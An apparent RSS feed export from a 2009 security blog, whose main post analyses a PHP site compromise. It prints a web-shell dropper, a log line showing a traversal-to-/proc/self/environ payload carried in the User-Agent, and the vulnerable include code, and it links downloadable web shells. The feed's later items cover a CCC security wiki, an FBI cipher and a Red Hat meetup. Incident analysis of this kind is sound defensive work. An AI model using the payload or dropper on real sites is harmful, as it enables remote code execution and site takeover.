UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--  /* Font Definitions */  @font-face 	{font-family:SimSun; 	panose-1:2 1 6 0 3 1 1 1 1 1; 	mso-font-alt:宋体; 	mso-font-charset:134; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:3 135135232 16 0 262145 0;} @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:1; 	mso-generic-font-family:roman; 	mso-font-format:other; 	mso-font-pitch:variable; 	mso-font-signature:0 0 0 0 0 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;} @font-face 	{font-family:"\@SimSun"; 	panose-1:2 1 6 0 3 1 1 1 1 1; 	mso-font-charset:134; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:3 135135232 16 0 262145 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:SimSun; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:SimSun; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --></p>
<blockquote>
<pre class="MsoNormal">File found - <a href="http://security.searix.net/wp-content/uploads/2009/03/backup.zip" target="_blank">backup.php</a> (2463) - 03/06/2009
File found - <a href="http://security.searix.net/wp-content/uploads/2009/03/shelld.zip" target="_blank">shelld.php</a> (23124) - 03/08/2009
File found - <a href="http://security.searix.net/wp-content/uploads/2009/03/php.zip" target="_blank">.php</a> (96420) - 03/07/2009
File found - <a href="http://security.searix.net/wp-content/uploads/2009/03/testa.zip" target="_blank">testa.php</a> (85) - 03/08/2009
File found - <a href="http://security.searix.net/wp-content/uploads/2009/03/test.zip" target="_blank">test.php</a> (38868) - 02/05/2009
File found - <a href="http://security.searix.net/wp-content/uploads/2009/03/c.zip" target="_blank">c.php</a> (597944) - 02/25/2009</pre>
</blockquote>
<p class="MsoNormal">The files are zipped and downloadable. Be sure to manage your AV exclusions. <img src='http://security.searix.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p class="MsoNormal">The file that requires some attention is testa.php.</p>
<p class="MsoNormal">testa.php</p>
<blockquote>
<pre>&lt;? <span style="color: #3366ff;">$</span><span style="color: #00ccff;">aa</span> = <span style="color: #3366ff;">$</span><span style="color: #00ccff;">_POST</span>[<span style="color: #ff00ff;">"shell"</span>];
<span style="color: #3366ff;">$</span><span style="color: #00ccff;">o</span> = <span style="color: #ff0000;">fopen</span>(<span style="color: #ff00ff;">"shelld.php"</span>,<span style="color: #ff00ff;">"wb"</span>);<span style="color: #ff0000;">fwrite</span>(<span style="color: #3366ff;">$</span><span style="color: #00ccff;">o</span>,<span style="color: #3366ff;">$</span><span style="color: #00ccff;">aa</span>);<span style="color: #ff0000;">fclose</span>(<span style="color: #3366ff;">$</span><span style="color: #00ccff;">o</span>); ?&gt;</pre>
</blockquote>
<p class="MsoNormal">I shall cut the crap and go straight to the logs. You may download a copy of all the logs <a href="http://security.searix.net/wp-content/uploads/2009/03/inv.zip" target="_blank">here</a>. But let’s take a look at a sample line –</p>
<blockquote>
<pre class="MsoNormal">92.241.137.238 - - [07/Mar/2009:23:36:02 +0000]
"GET /?p=../../../../../../../../../../../../..<span style="color: #ff0000;">/proc/self/environ</span><span style="color: #0000ff;"><strong>%00</strong></span> HTTP/1.1"
200 15491 "-"
"<span style="color: #800080;">&lt;? $o=fopen(\"testa.php\",\"a+\"); fwrite($o,\"stefo je king\"); fclose($o); ?&gt;</span>"</pre>
</blockquote>
<p class="MsoNormal">A directory traversal attack! I haven’t seen one like that in years!  But this one is smart. For those who do not understand what that line in the logs mean - a user using the IP address 92.241.137.238 visited the page</p>
<pre>/?p=../../../../../../../../../../../../..<span style="color: #ff0000;">/proc/self/environ</span><span style="color: #0000ff;"><strong>%00</strong></span></pre>
<p><span style="color: #0000ff;"><span style="color: #000000;"> with the browser headers as PHP code.</span><br />
</span></p>
<p>Let’s take a look at the output of the GET URL –</p>
<div id="attachment_100" class="wp-caption aligncenter" style="width: 310px"><a href="http://security.searix.net/wp-content/uploads/2009/03/traverse1.png"><img class="size-medium wp-image-100" title="Directory Traversal With Null-Byte Attack" src="http://security.searix.net/wp-content/uploads/2009/03/traverse1-300x203.png" alt="Smart, eh?" width="300" height="203" /></a><p class="wp-caption-text">Smart, eh? Click to enlarge.</p></div>
<p>It seems like the browser and PHP information are output.</p>
<p>Looking at some relevant PHP code –</p>
<blockquote>
<pre class="MsoNormal"> &lt;? <span style="color: #339966;">// Change This</span>
        <span style="color: #3366ff;">$</span><span style="color: #33cccc;">p</span> = <span style="color: #ff0000;">stripslashes</span>(<span style="color: #3366ff;">$</span><span style="color: #33cccc;">_REQUEST</span>[<span style="color: #ff00ff;">'p'</span>]);
    if(<span style="color: #ff0000;">file_exists</span>(CWD.<span style="color: #ff00ff;">'/'</span>.<span style="color: #3366ff;">$</span><span style="color: #33cccc;">p</span>.<span style="color: #ff00ff;">'.php'</span>)){
        <span style="color: #0000ff;">include</span>(CWD.<span style="color: #ff00ff;">'/'</span>.<span style="color: #3366ff;">$</span><span style="color: #33cccc;">p</span>.<span style="color: #ff00ff;">'.php'</span>);
    }else{
        <span style="color: #0000ff;">include</span>(CWD.<span style="color: #ff00ff;">'/'</span>.<span style="color: #3366ff;">$</span><span style="color: #33cccc;">_SESSION</span>[<span style="color: #ff00ff;">'lan'</span>].<span style="color: #ff00ff;">'/'</span>.<span style="color: #3366ff;">$</span><span style="color: #33cccc;">p</span>.<span style="color: #ff00ff;">'.php'</span>);
}?&gt;</pre>
</blockquote>
<p class="MsoNormal">&#8220;This&#8221; certainly needs to be changed. <img src='http://security.searix.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p class="MsoNormal">Let’s look at the query executed again. The null byte is used to ignore the “.php” extension and only include <em>/proc/self/environ</em></p>
<p class="MsoNormal">What’s even smarter is this – because browser information is <em>include</em>’d, PHP code was used as the browser headers and was therefore <em>include</em>d and parsed.</p>
<p class="MsoNormal">If you look further down the logs, you will realize that the C99 shell is also included from a certain URL –</p>
<p class="MsoNormal">
<div id="attachment_101" class="wp-caption aligncenter" style="width: 536px"><a href="http://security.searix.net/wp-content/uploads/2009/03/w7edbyru.png"><img class="size-full wp-image-101" title="w7edbyru" src="http://security.searix.net/wp-content/uploads/2009/03/w7edbyru.png" alt="Shells. Sea Shells. Remote Shells. Evil Shells." width="526" height="243" /></a><p class="wp-caption-text">Shells. Sea Shells. Remote Shells. Evil Shells.</p></div>
<p class="MsoNormal">Looks like someone set up a site just for this purpose.</p>
<p class="MsoNormal">There are other things probably worth mentioning, but I guess not this time. The things to take away would be –</p>
<p class="MsoNormal">
<ol>
<li>Always sanitize parameters passed to functions like require’s, require_once’s, include’s, include_once’s, fopen’s, file_get_contents’, etc to prevent directory traversal</li>
<li>Using /proc/self/environ as an attack vector to execute PHP code remotely that is hardly ever published. I hope that this article provided you with some insights.</li>
<li>And to all the security researchers out there – You can now stop using the cat /etc/passwd POC and start using something like this. =)</li>
</ol>
<p class="MsoNormal">
<p class="MsoNormal">Have fun and take care <img src='http://security.searix.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://security.searix.net/?feed=rss2&amp;p=92</wfw:commentRss>
		<feedburner:origLink>http://security.searix.net/?p=92</feedburner:origLink></item>
		<item>
		<title>How To Survive (the CCC)</title>
		<link>http://feedproxy.google.com/~r/SearixSecurityBlog/~3/C16qy-EICKQ/</link>
		<comments>http://security.searix.net/?p=89#comments</comments>
		<pubDate>Tue, 30 Dec 2008 08:31:40 +0000</pubDate>
		<dc:creator>alt3rn4tiv3</dc:creator>
		
		<category><![CDATA[Events]]></category>

		<category><![CDATA[CCC]]></category>

		<guid isPermaLink="false">http://security.searix.net/?p=89</guid>
		<description><![CDATA[<br/>The CCC has published a wiki article that advises its attendees on various practices to help them not get &#8220;hacked&#8221; during the congress itself. After all, security conferences like these are like warzones.  
The article touches on various aspects of security, including software and physical security. It also has a brief roundup on how [...]]]></description>
			<content:encoded><![CDATA[<br/><p>The CCC has published a wiki article that advises its attendees on various practices to help them not get &#8220;hacked&#8221; during the congress itself. After all, security conferences like these are like warzones. <img src='http://security.searix.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>The article touches on various aspects of security, including software and physical security. It also has a brief roundup on how to secure each system. Of course, there&#8217;s nothing too detailed and it might even be missing a couple of possible attack vectors,  but the general idea is there.</p>
<p><a href="http://events.ccc.de/congress/2008/wiki/How_To_Survive" target="_blank">Check it out.</a> <img src='http://security.searix.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://security.searix.net/?feed=rss2&amp;p=89</wfw:commentRss>
		<feedburner:origLink>http://security.searix.net/?p=89</feedburner:origLink></item>
		<item>
		<title>FBI Issues Second Code-Breaking Challenge</title>
		<link>http://feedproxy.google.com/~r/SearixSecurityBlog/~3/U9Zj5bZpwQU/</link>
		<comments>http://security.searix.net/?p=85#comments</comments>
		<pubDate>Tue, 30 Dec 2008 07:47:20 +0000</pubDate>
		<dc:creator>alt3rn4tiv3</dc:creator>
		
		<category><![CDATA[Bits and Pieces]]></category>

		<category><![CDATA[Reviews]]></category>

		<guid isPermaLink="false">http://security.searix.net/?p=85</guid>
		<description><![CDATA[<br/>Like last year&#8217;s challenge, this year&#8217;s challenge (imho) is another lame attempt at publicity.
The cipher is presented in a SWF -
FWTDLCSWV. YD
NSLMIJFWEJFD GSW SL
NIJNQBLM FOBV EJFDVF
DLNIGTFBSL. KBVBF
YYY.AHB.MSK/NSCDC.OFZ
FS EDF WV QLSY SA
GSWI VWNNDVV.
It&#8217;s a simple substitution cipher that gives -
stupendous. we
congratulate you on
cracking this latest
encryption. visit
www.fbi.gov/coded.htm
to let us know of
your success.
Not exactly &#8220;latest encryption&#8221;.  

]]></description>
			<content:encoded><![CDATA[<br/><p>Like last year&#8217;s challenge,<a href="http://www.fbi.gov/page2/dec08/code_122908.html" target="_blank"> this year&#8217;s challenge</a> (imho) is another lame attempt at publicity.</p>
<p>The cipher is presented in a SWF -</p>
<blockquote><p><em><span>FWTDLCSWV. YD<br />
NSLMIJFWEJFD GSW SL<br />
NIJNQBLM FOBV EJFDVF<br />
DLNIGTFBSL. KBVBF<br />
YYY.AHB.MSK/NSCDC.OFZ<br />
FS EDF WV QLSY SA<br />
GSWI VWNNDVV.</span></em></p></blockquote>
<p><span>It&#8217;s a simple substitution cipher that gives -</span></p>
<blockquote><p><span>stupendous. we<br />
congratulate you on<br />
cracking this latest<br />
encryption. visit<br />
<a href="http://www.fbi.gov/coded.htm">www.fbi.gov/coded.htm</a><br />
to let us know of<br />
your success.</span></p></blockquote>
<p>Not exactly &#8220;latest encryption&#8221;. <img src='http://security.searix.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> <span><br />
</span></p>
]]></content:encoded>
			<wfw:commentRss>http://security.searix.net/?feed=rss2&amp;p=85</wfw:commentRss>
		<feedburner:origLink>http://security.searix.net/?p=85</feedburner:origLink></item>
		<item>
		<title>SSMG December 2008 Meetup</title>
		<link>http://feedproxy.google.com/~r/SearixSecurityBlog/~3/6P4wVFTPzw0/</link>
		<comments>http://security.searix.net/?p=82#comments</comments>
		<pubDate>Sat, 27 Dec 2008 08:39:06 +0000</pubDate>
		<dc:creator>alt3rn4tiv3</dc:creator>
		
		<category><![CDATA[Events]]></category>

		<category><![CDATA[Reviews]]></category>

		<category><![CDATA[meetup]]></category>

		<category><![CDATA[red hat]]></category>

		<category><![CDATA[ssmg]]></category>

		<guid isPermaLink="false">http://security.searix.net/?p=82</guid>
		<description><![CDATA[<br/>It is pretty late for a mention of the last SSMG meetup, which occurred on 18th December at Red Hat Asia-Pacific, but I&#8217;m sharing this anyway. Eugene Teo spoke generally about the process of the handling of bug reports at Red Hat. A short biography of Eugene -
Eugene Teo works for the Red Hat Security [...]]]></description>
			<content:encoded><![CDATA[<br/><p>It is pretty late for a mention of the last SSMG meetup, which occurred on 18th December at Red Hat Asia-Pacific, but I&#8217;m sharing this anyway. Eugene Teo spoke generally about the process of the handling of bug reports at Red Hat. A short biography of Eugene -</p>
<blockquote><p><span style="font-family: arial,helvetica,sans-serif;">Eugene Teo works for the Red Hat Security Team (only one in AP). He focuses on Linux kernel security. He has been an active member of the Linux and open source community in Singapore for over a decade, having held different portfolios within the Linux Users&#8217; Group of Singapore. Eugene has spoken at numerous conferences, including the Red Hat Summit, GNOME.Asia, and Linux Conference Australia.</span></p></blockquote>
<p>Follow ups by Eugene through email</p>
<blockquote><p>Hi all,</p>
<p>For those who attended my talk, thanks a lot. I hope you find it useful.</p>
<p>Here are a couple of notes that you will find useful:</p>
<p>- Red Hat published a risk report on the three years of Red Hat</p>
<p>Enterprise Linux 4. Feel free to read it at:</p>
<p><a href="http://www.redhatmagazine.com/2008/02/26/risk-report-three-years-of-red-hat-enterprise-linux-4/" target="_blank">http://www.redhatmagazine.com/2008/02/26/risk-report-three-years-of-red-hat-enterprise-linux-4/</a></p>
<p>- How do you find out if Red Hat have fixed a particular named issue?</p>
<p>Most public security issues that affect Red Hat will already have an</p>
<p>assigned CVE number[1]. The CVE number will be formatted as</p>
<p>CVE-YYYY-XXXX where YYYY is a year, and XXXX is a 4 digit integer.</p>
<p>Use the Red Hat Network to see if we have issued updates that correct</p>
<p>this issue:</p>
<p>Example: <a href="http://rhn.redhat.com/errata/CVE-2008-3526.html" target="_blank">http://rhn.redhat.com/errata/CVE-2008-3526.html</a></p>
<p>It is possible that an issue affects one of our products, but has not</p>
<p>had an update released yet. We track all known issues in bugzilla, and</p>
<p>place the CVE id in the summary line. Doing a bugzilla search for a</p>
<p>given CVE id should reveal if we are working on it.</p>
<p>Example: <a href="https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2008-4554" target="_blank">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2008-4554</a></p>
<p>If you do not see anything there perhaps this is an issue that for</p>
<p>some reason does not affect Red Hat. If so, we will have given an</p>
<p>official vendor statement to the National Vulnerability Database.</p>
<p>Example: <a href="http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4618" target="_blank">http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4618</a></p>
<p>[1] CVE stands for Common Vulnerabilities and Exposures (CVE). Check</p>
<p>out: <a href="http://cve.mitre.org/" target="_blank">http://cve.mitre.org/</a></p>
<p>Thanks, Eugene</p></blockquote>
<p><span style="font-family: arial,helvetica,sans-serif;"></p>
<p></span></p>
]]></content:encoded>
			<wfw:commentRss>http://security.searix.net/?feed=rss2&amp;p=82</wfw:commentRss>
		<feedburner:origLink>http://security.searix.net/?p=82</feedburner:origLink></item>
		<item>
		<title>2008’s Popular Applications with Critical Vulnerabilities</title>
